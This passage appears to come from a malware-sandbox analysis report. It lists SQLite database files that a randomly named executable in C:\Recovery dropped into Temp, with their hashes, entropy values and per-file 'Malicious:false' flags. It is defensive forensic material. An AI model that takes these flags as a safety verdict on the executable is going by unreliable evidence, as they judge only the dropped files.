                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\EOhiAJxKR1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\EPRG3nxPIo

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\EphBQS2V3g

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\EvNRYDvPdF

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\FCbki2b2HN

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\FNVdZ52AWW

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\FWHy7K859y

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\FZjmDV3clM

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\FaBQhyhG4r

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\FelTmWx3m5

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\FmsKmnN6M1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\G4hGjBsjPv

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\GHK6EDgURJ

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\H2jsU3Z45j

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\H2twyRYzJj

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\HEAv7CEQAo

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\HHXBE8ATu5

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\HSYHXiBesw

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):98304
                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\HX2zDepnyn

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\HkjybKzEK2

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\HoszUy5gK4

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\Hs3uyxkUtf

                                                                                                                                        Download File
